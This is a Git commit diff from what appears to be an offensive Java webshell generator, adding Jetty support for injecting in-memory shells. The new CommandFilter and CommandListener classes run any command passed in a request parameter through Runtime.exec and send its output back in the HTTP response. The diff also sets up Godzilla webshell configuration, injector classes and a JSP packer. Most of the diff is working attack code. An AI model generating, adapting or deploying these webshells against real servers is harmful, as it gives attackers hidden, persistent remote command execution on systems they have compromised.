feat: support jetty shell generate

Author: ReaJason

generator/src/main/java/com/reajason/javaweb/GeneratorMain.java

@@ -1,8 +1,10 @@
 package com.reajason.javaweb;
 
 import com.reajason.javaweb.config.*;
+import com.reajason.javaweb.memsell.jetty.JettyShell;
 import com.reajason.javaweb.memsell.packer.Packer;
 import com.reajason.javaweb.memsell.tomcat.TomcatShell;
+import lombok.SneakyThrows;
 
 import java.io.IOException;
 
@@ -11,19 +13,22 @@
  * @since 2024/11/24
  */
 public class GeneratorMain {
+    static TomcatShell tomcatShell = new TomcatShell();
+    static JettyShell jettyShell = new JettyShell();
+
     public static void main(String[] args) throws IOException {
         ShellConfig shellConfig = ShellConfig.builder()
-                .server(Server.TOMCAT)
+                .server(Server.JETTY)
                 .shellTool(ShellTool.Godzilla)
-                .shellType(TomcatShell.LISTENER).build();
+                .shellType(Constants.FILTER).build();
         GodzillaConfig godzillaConfig = GodzillaConfig.builder()
-                .pass("pass123")
-                .key("key123")
+                .pass("pass")
+                .key("key")
                 .headerName("User-Agent")
-                .headerValue("test")
+                .headerValue("test123")
                 .build();
-
-        byte[] bytes = generate(shellConfig, new InjectorConfig(), godzillaConfig, Packer.INSTANCE.ScriptEngine);
+        InjectorConfig injectorConfig = new InjectorConfig();
+        byte[] bytes = generate(shellConfig, injectorConfig, godzillaConfig, Packer.INSTANCE.JSP);
         if (bytes != null) {
             System.out.println(new String(bytes));
         }
@@ -32,22 +37,24 @@ public static void main(String[] args) throws IOException {
     public static GenerateResult generate(ShellConfig shellConfig, InjectorConfig injectorConfig, ShellToolConfig shellToolConfig) {
         switch (shellConfig.getServer()) {
             case TOMCAT:
-                return TomcatShell.generate(shellConfig, injectorConfig, shellToolConfig);
+                return tomcatShell.generate(shellConfig, injectorConfig, shellToolConfig);
+            case JETTY:
+                return jettyShell.generate(shellConfig, injectorConfig, shellToolConfig);
             case BES:
                 break;
             case RESIN:
                 break;
-            case JETTY:
-                break;
             default:
                 throw new IllegalArgumentException("Unsupported server");
         }
         return null;
     }
 
+    @SneakyThrows
     public static byte[] generate(ShellConfig shellConfig, InjectorConfig injectorConfig, ShellToolConfig shellToolConfig, Packer.INSTANCE packerInstance) {
         GenerateResult generateResult = generate(shellConfig, injectorConfig, shellToolConfig);
         if (generateResult != null) {
+//            Files.write(Paths.get( injectorConfig.getInjectorClassName() + ".class"), generateResult.getInjectorBytes(), StandardOpenOption.CREATE_NEW);
             return packerInstance.getPacker().pack(generateResult);
         }
         return null;

generator/src/main/java/com/reajason/javaweb/config/Constants.java

@@ -8,4 +8,11 @@
  */
 public class Constants {
     public static final int DEFAULT_VERSION = Opcodes.V1_6;
+
+    public static final String SERVLET = "Servlet";
+    public static final String JAKARTA_SERVLET = "JakartaServlet";
+    public static final String FILTER = "Filter";
+    public static final String JAKARTA_FILTER = "JakartaFilter";
+    public static final String LISTENER = "Listener";
+    public static final String JAKARTA_LISTENER = "JakartaListener";
 }

generator/src/main/java/com/reajason/javaweb/godzilla/GodzillaManager.java

@@ -140,7 +140,9 @@ public boolean start() {
             if (response.isSuccessful()) {
                 return true;
             }
-        } catch (IOException ignored) {
+            System.out.println(response.body().string());
+        } catch (IOException e) {
+            e.printStackTrace();
         }
         return false;
     }

generator/src/main/java/com/reajason/javaweb/memsell/AbstractShell.java

@@ -0,0 +1,70 @@
+package com.reajason.javaweb.memsell;
+
+import com.reajason.javaweb.config.*;
+import org.apache.commons.lang3.tuple.Pair;
+
+import java.util.HashMap;
+import java.util.Map;
+
+/**
+ * @author ReaJason
+ * @since 2024/12/7
+ */
+public abstract class AbstractShell {
+    protected final Map<String, Pair<Class<?>, Class<?>>> godzillaShellMap = new HashMap<>();
+    protected final Map<String, Pair<Class<?>, Class<?>>> commandShellMap = new HashMap<>();
+
+    public AbstractShell() {
+        initializeShellMaps();
+    }
+
+    /**
+     * setup map
+     */
+    protected abstract void initializeShellMaps();
+
+    public GenerateResult generate(ShellConfig shellConfig, InjectorConfig injectorConfig, ShellToolConfig shellToolConfig) {
+        Class<?> injectorClass = injectorConfig.getInjectorClass();
+        byte[] shellBytes;
+
+        Pair<Class<?>, Class<?>> classPair = getClassPair(shellConfig);
+
+        if (injectorClass == null) {
+            injectorClass = classPair.getRight();
+        }
+        shellToolConfig.setClazz(classPair.getLeft());
+
+        shellBytes = generateShellBytes(shellConfig, shellToolConfig);
+
+        injectorConfig = injectorConfig
+                .toBuilder()
+                .injectorClass(injectorClass)
+                .shellClassName(shellToolConfig.getClassName())
+                .shellClassBytes(shellBytes).build();
+
+        byte[] injectorBytes = InjectorGenerator.generate(shellConfig, injectorConfig);
+
+        return GenerateResult.builder()
+                .shellConfig(shellConfig)
+                .shellToolConfig(shellToolConfig)
+                .injectorConfig(injectorConfig)
+                .shellClassName(shellToolConfig.getClassName())
+                .shellBytes(shellBytes)
+                .injectorClassName(injectorClass.getName())
+                .injectorBytes(injectorBytes)
+                .build();
+    }
+
+    private Pair<Class<?>, Class<?>> getClassPair(ShellConfig shellConfig) {
+        Map<String, Pair<Class<?>, Class<?>>> shellMap = shellConfig.getShellTool() == ShellTool.Godzilla ? godzillaShellMap : commandShellMap;
+        return shellMap.get(shellConfig.getShellType());
+    }
+
+    private byte[] generateShellBytes(ShellConfig shellConfig, ShellToolConfig shellToolConfig) {
+        return switch (shellConfig.getShellTool()) {
+            case Godzilla -> GodzillaGenerator.generate(shellConfig, (GodzillaConfig) shellToolConfig);
+            case Command -> CommandGenerator.generate(shellConfig, (CommandConfig) shellToolConfig);
+            default -> throw new UnsupportedOperationException("Unknown shell tool: " + shellConfig.getShellTool());
+        };
+    }
+}

generator/src/main/java/com/reajason/javaweb/memsell/jetty/JettyShell.java

@@ -0,0 +1,32 @@
+package com.reajason.javaweb.memsell.jetty;
+
+import com.reajason.javaweb.memsell.AbstractShell;
+import com.reajason.javaweb.memsell.jetty.command.CommandFilter;
+import com.reajason.javaweb.memsell.jetty.command.CommandListener;
+import com.reajason.javaweb.memsell.jetty.godzilla.GodzillaFilter;
+import com.reajason.javaweb.memsell.jetty.godzilla.GodzillaListener;
+import com.reajason.javaweb.memsell.jetty.injector.JettyFilterInjector;
+import com.reajason.javaweb.memsell.jetty.injector.JettyListenerInjector;
+import org.apache.commons.lang3.tuple.Pair;
+
+import static com.reajason.javaweb.config.Constants.*;
+
+/**
+ * @author ReaJason
+ * @since 2024/12/7
+ */
+public class JettyShell extends AbstractShell {
+
+    @Override
+    protected void initializeShellMaps() {
+        godzillaShellMap.put(FILTER, Pair.of(GodzillaFilter.class, JettyFilterInjector.class));
+        godzillaShellMap.put(JAKARTA_FILTER, Pair.of(GodzillaFilter.class, JettyFilterInjector.class));
+        godzillaShellMap.put(LISTENER, Pair.of(GodzillaListener.class, JettyListenerInjector.class));
+        godzillaShellMap.put(JAKARTA_LISTENER, Pair.of(GodzillaListener.class, JettyListenerInjector.class));
+
+        commandShellMap.put(FILTER, Pair.of(CommandFilter.class, JettyFilterInjector.class));
+        commandShellMap.put(JAKARTA_FILTER, Pair.of(CommandFilter.class, JettyFilterInjector.class));
+        commandShellMap.put(LISTENER, Pair.of(CommandListener.class, JettyListenerInjector.class));
+        commandShellMap.put(JAKARTA_LISTENER, Pair.of(CommandListener.class, JettyListenerInjector.class));
+    }
+}

generator/src/main/java/com/reajason/javaweb/memsell/jetty/command/CommandFilter.java

@@ -0,0 +1,48 @@
+package com.reajason.javaweb.memsell.jetty.command;
+
+import javax.servlet.*;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+import java.io.IOException;
+import java.io.InputStream;
+
+/**
+ * @author ReaJason
+ * @since 2024/11/24
+ */
+public class CommandFilter implements Filter {
+    public String paramName = "{{paramName}}";
+
+    @Override
+    public void init(FilterConfig filterConfig) throws ServletException {
+
+    }
+
+    @Override
+    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException {
+        HttpServletRequest servletRequest = (HttpServletRequest) request;
+        HttpServletResponse servletResponse = (HttpServletResponse) response;
+        String cmd = servletRequest.getParameter(paramName);
+        try {
+            if (cmd != null) {
+                Process exec = Runtime.getRuntime().exec(cmd);
+                InputStream inputStream = exec.getInputStream();
+                ServletOutputStream outputStream = servletResponse.getOutputStream();
+                byte[] buf = new byte[8192];
+                int length;
+                while ((length = inputStream.read(buf)) != -1) {
+                    outputStream.write(buf, 0, length);
+                }
+            } else {
+                chain.doFilter(servletRequest, servletResponse);
+            }
+        } catch (Exception e) {
+            chain.doFilter(servletRequest, servletResponse);
+        }
+    }
+
+    @Override
+    public void destroy() {
+
+    }
+}

generator/src/main/java/com/reajason/javaweb/memsell/jetty/command/CommandListener.java

@@ -0,0 +1,74 @@
+package com.reajason.javaweb.memsell.jetty.command;
+
+import javax.servlet.ServletOutputStream;
+import javax.servlet.ServletRequestEvent;
+import javax.servlet.ServletRequestListener;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+import java.io.InputStream;
+import java.lang.reflect.Field;
+
+/**
+ * @author ReaJason
+ */
+public class CommandListener implements ServletRequestListener {
+    public String paramName = "{{paramName}}";
+
+    public CommandListener() {
+    }
+
+    @Override
+    public void requestDestroyed(ServletRequestEvent sre) {
+
+    }
+
+    @Override
+    public void requestInitialized(ServletRequestEvent servletRequestEvent) {
+        HttpServletRequest request = (HttpServletRequest) servletRequestEvent.getServletRequest();
+        try {
+            String cmd = request.getParameter(paramName);
+            if (cmd != null) {
+                HttpServletResponse servletResponse = this.getResponseFromRequest(request);
+                Process exec = Runtime.getRuntime().exec(cmd);
+                InputStream inputStream = exec.getInputStream();
+                ServletOutputStream outputStream = servletResponse.getOutputStream();
+                byte[] buf = new byte[8192];
+                int length;
+                while ((length = inputStream.read(buf)) != -1) {
+                    outputStream.write(buf, 0, length);
+                }
+            }
+        } catch (Exception ignored) {
+        }
+    }
+
+    private HttpServletResponse getResponseFromRequest(HttpServletRequest request) throws Exception {
+        HttpServletResponse response = null;
+        try {
+            response = (HttpServletResponse) getFieldValue(getFieldValue(request, "_channel"), "_response");
+        } catch (Exception e) {
+            response = (HttpServletResponse) getFieldValue(getFieldValue(request, "_connection"), "_response");
+        }
+        return response;
+    }
+
+    @SuppressWarnings("all")
+    public static synchronized Object getFieldValue(Object obj, String name) throws Exception {
+        Field field = null;
+        Class<?> clazz = obj.getClass();
+        while (clazz != Object.class) {
+            try {
+                field = clazz.getDeclaredField(name);
+                break;
+            } catch (NoSuchFieldException var5) {
+                clazz = clazz.getSuperclass();
+            }
+        }
+        if (field == null) {
+            throw new NoSuchFieldException(name);
+        } else {
+            field.setAccessible(true);
+            return field.get(obj);
+        }
+    }
+}